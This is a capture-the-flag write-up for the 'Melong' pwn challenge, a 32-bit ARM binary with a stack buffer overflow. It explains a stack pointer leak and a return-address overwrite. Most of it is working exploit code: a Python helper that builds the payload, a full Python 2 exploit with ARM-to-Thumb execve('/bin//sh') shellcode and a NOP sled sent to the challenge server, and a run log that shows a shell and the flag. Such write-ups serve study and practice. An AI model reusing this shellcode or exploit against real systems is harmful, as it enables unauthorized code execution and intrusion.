## === Melong (Pwn: 26 solves / 50 pts) ===

1. The binary is 32-bit little-endian ARM.
2. The "personal training" time registered through menu 3 sets how many bytes the later Write (menu 4) may copy into a fixed-size stack buffer, so a large value turns Write into a stack buffer overflow.
3. The echo of the written buffer is not terminated, so a 32-byte write is followed by four bytes of a stack pointer; the buffer itself sits 0x40 below that pointer.
4. Because the distance between the leaked pointer and the buffer may not be identical in every environment, the payload starts with an ARM NOP sled (mov r0, r0 = \x00\x00\xa0\xe1) in front of the shellcode, so a slightly wrong target still lands on executable NOPs.
5. The saved return address sits 84 bytes into the buffer; overwriting it with the buffer address makes the function return into the sled and run the shellcode from the stack.
6. The program waits for the registered training time (32 seconds, then 88 seconds), so the exploit below takes about two minutes end to end.
7. minipwn.py is taken from the following URL:
https://github.com/inaz2/minipwn/blob/master/minipwn.py
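
The steps above (leak parsing, buffer address arithmetic, NOP sled plus shellcode, return address at offset 84) as a stand-alone Python 3 helper. This is an added example, not code from the original writeup or from minipwn; it reuses the writeup's shellcode bytes and offsets, and its sample response is constructed from the leak value seen in the run below, not captured from the server. The `arm_mov_reg` encoder shows why `\x00\x00\xa0\xe1` is a NOP, and `build_payload` adds the checks a practitioner would want before sending: 4-byte alignment of the target, no newline byte in the payload (Write uses sendline), and the sled not overrunning the return address.

```python
import struct

# Constants taken from the writeup.
ECHO_PREFIX = b"you wrote "   # the program echoes the buffer after this text
PROBE_LEN = 32                # the first Write() sends 32 '1's to reach the leak
LEAK_TO_BUF = 0x40            # leaked pointer - 0x40 == address of our buffer
RET_OFFSET = 84               # saved return address sits 84 bytes into the buffer
PAYLOAD_LEN = 88              # length registered before the final Write()

# The writeup's shellcode: two ARM words (add r7, pc, #1 ; bx r7) switch to
# Thumb, then execve("/bin//sh", ["/bin//sh"], 0) via svc 1 with r7 = 11.
SHELLCODE = (b"\x01\x70\x8f\xe2\x17\xff\x2f\xe1\x04\xa7\x03\xcf\x52\x40\x07\xb4"
             b"\x68\x46\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin//sh")


def arm_mov_reg(rd, rm, cond=0xE):
    """Encode the ARM data-processing instruction MOV<cond> rd, rm.

    Bit layout: cond[31:28] | 00 | I=0 | opcode[24:21]=1101 (MOV) | S=0 |
    Rn[19:16]=0000 | Rd[15:12] | shift=0 | Rm[3:0].  Returned little-endian.
    """
    opcode_mov = 0xD
    word = (cond << 28) | (opcode_mov << 21) | (rd << 12) | rm
    return struct.pack("<I", word)


def arm_nop():
    """MOV r0, r0 (0xE1A00000), the ARM NOP the writeup pads with."""
    return arm_mov_reg(0, 0)


def parse_leak(response):
    """Parse the reply to Write('1' * 32).

    Returns (leaked_stack_pointer, buffer_address).  The four bytes after the
    echoed probe are a stack pointer that the missing terminator lets through.
    """
    if not response.startswith(ECHO_PREFIX):
        raise ValueError("unexpected echo: %r" % response[:16])
    start = len(ECHO_PREFIX) + PROBE_LEN
    leak_bytes = response[start:start + 4]
    if len(leak_bytes) != 4:
        raise ValueError("short read: need 4 leak bytes, got %d" % len(leak_bytes))
    leak = struct.unpack("<I", leak_bytes)[0]
    return leak, leak - LEAK_TO_BUF


def build_payload(buf_addr, sled_words=10):
    """Lay out [NOP sled][shellcode]['2' filler][saved return address]."""
    if buf_addr & 3:
        raise ValueError("ARM mode needs a 4-byte aligned target: 0x%x" % buf_addr)
    body = arm_nop() * sled_words + SHELLCODE + b"\x00"
    if len(body) > RET_OFFSET:
        raise ValueError("sled + shellcode (%d bytes) overruns the return address" % len(body))
    payload = body.ljust(RET_OFFSET, b"2") + struct.pack("<I", buf_addr)
    # Write() uses sendline() and the target reads a line, so a 0x0a byte
    # anywhere in the payload (most likely in the address) would truncate it.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte; aim at another word of the sled")
    if len(payload) != PAYLOAD_LEN:
        raise ValueError("payload is %d bytes, Register(%d) expected" % (len(payload), PAYLOAD_LEN))
    return payload


def sled_tolerance(payload, sled_words=10):
    """Bytes by which the guessed address may exceed the real buffer start and
    still land on a NOP: (words - 1) * 4.  Lower than the real start crashes."""
    sled = payload[:sled_words * 4]
    words = [sled[i:i + 4] for i in range(0, len(sled), 4)]
    if any(w != arm_nop() for w in words):
        raise ValueError("sled region is not all NOPs")
    return (sled_words - 1) * 4


# Constructed sample of the first Write() reply, using the leak value printed
# in the run below (0xf6fffca8); not a capture from the challenge server.
SAMPLE_RESPONSE = ECHO_PREFIX + b"1" * PROBE_LEN + struct.pack("<I", 0xF6FFFCA8)

if __name__ == "__main__":
    leak, buf = parse_leak(SAMPLE_RESPONSE)
    payload = build_payload(buf)
    print("leak      = 0x%08x" % leak)
    print("buffer    = 0x%08x" % buf)
    print("ret @ +84 = %s" % payload[RET_OFFSET:].hex())
    print("sled tolerates a guess up to +%d bytes" % sled_tolerance(payload))
```

With the leak from the run below the helper reproduces the writeup's numbers: buffer at 0xf6fffc68, an 88-byte payload whose last four bytes are `68 fc ff f6`, and a sled that absorbs up to 36 bytes of over-estimate. The one value the live exploit does not check, and this helper does, is the newline byte: had the stack been at an address containing 0x0a, `sendline` would have cut the payload short and the return address would never have been written.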

```
# Python 2 exploit (minipwn treats str as bytes and uses print statements).
import socket
from minipwn import *

#s = connect_process("./melong")
s = socket.create_connection(('ch41l3ng3s.codegate.kr', 1199))

# 36-byte ARM -> Thumb execve("/bin//sh") shellcode:
#   add r7, pc, #1 ; bx r7     switch to Thumb mode
#   then r0 = "/bin//sh", r1 = argv on the stack, r2 = 0, r7 = 11, svc 1
shellcode = '\x01\x70\x8f\xe2\x17\xff\x2f\xe1\x04\xa7\x03\xcf\x52\x40\x07\xb4\x68\x46\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x2f\x73\x68'

def Check():
    # menu 1: enter height and weight
    print "Check()"
    recvuntil(s, "Type the number:")
    sendline(s, "1")
    recvuntil(s, "Your height(meters) : ")
    sendline(s, "1.65")
    recvuntil(s, "Your weight(kilograms) : ")
    sendline(s, "100")

def Exercise():
    # menu 2
    print "Exercise()"
    recvuntil(s, "Type the number:")
    sendline(s, "2")

def Register(time):
    # menu 3: the training time doubles as the number of bytes Write() may copy
    print "Register()", time
    recvuntil(s, "Type the number:")
    sendline(s, "3")
    recvuntil(s, "How long do you want to take personal training?\n")
    sendline(s, str(time))

def Write(buf):
    # menu 4: copies up to the registered length into the stack buffer and echoes it
    print "Write()", buf
    recvuntil(s, "Type the number:")
    sendline(s, "4")
    sendline(s, buf)

def Out():
    # menu 6: leave the menu; the return goes through the overwritten address
    print "Out()"
    recvuntil(s, "Type the number:")
    sendline(s, "6")

Check()
Check()
Exercise()
Register(32)   # allow a 32-byte write: fills the buffer right up to the leaked pointer

print "Wait 32 seconds !!!!!!!!!"
Write("1"*32)
r = s.recv(10+32+4)                 # "you wrote " (10) + 32 echoed bytes + 4 leaked bytes
print r
stack_leak_addr = u32(r[42:46])     # the stack pointer that follows the unterminated echo
stack_buf_addr = stack_leak_addr - 0x40   # our buffer sits 0x40 below it
print "stack_leak_addr = ", hex(stack_leak_addr)
print "stack_buf_addr = ", hex(stack_buf_addr)

Register(88)   # allow an 88-byte write: 84 bytes up to the saved return address + 4
Register(88)

buf = "\x00\x00\xa0\xe1" * 10 + shellcode + '\x00'   # ARM NOP sled (mov r0, r0) + shellcode
buf = buf.ljust(84, '2')                              # pad up to the saved return address
buf += p32(stack_buf_addr)                            # return into the start of the sled
print "Wait 88 seconds !!!!!!!!!!!!!!!!!"
Write(buf)

Out()          # trigger the return into the shellcode

interact(s)
```

```
hoge@ubuntu:~/Pwn_Melong$ python exploit.py
Check()
Check()
Exercise()
Register() 32
Wait 32 seconds !!!!!!!!!
Write() 11111111111111111111111111111111
you wrote 11111111111111111111111111111111���
stack_leak_addr = 0xf6fffca8
stack_buf_addr = 0xf6fffc68
Register() 88
Register() 88
Wait 88 seconds !!!!!!!!!!!!!!!!!
Write() ��������������������?p?�/�?�?�R@�hF�iF
'?��F/bin//sh2222222h��
Out()
See you again :)
id
uid=1000(melong) gid=1000(melong) groups=1000(melong)
ls
flag
cat flag
FLAG{D0n7_7h1nk_7ha7_1_Can_3xp1ain_it}
```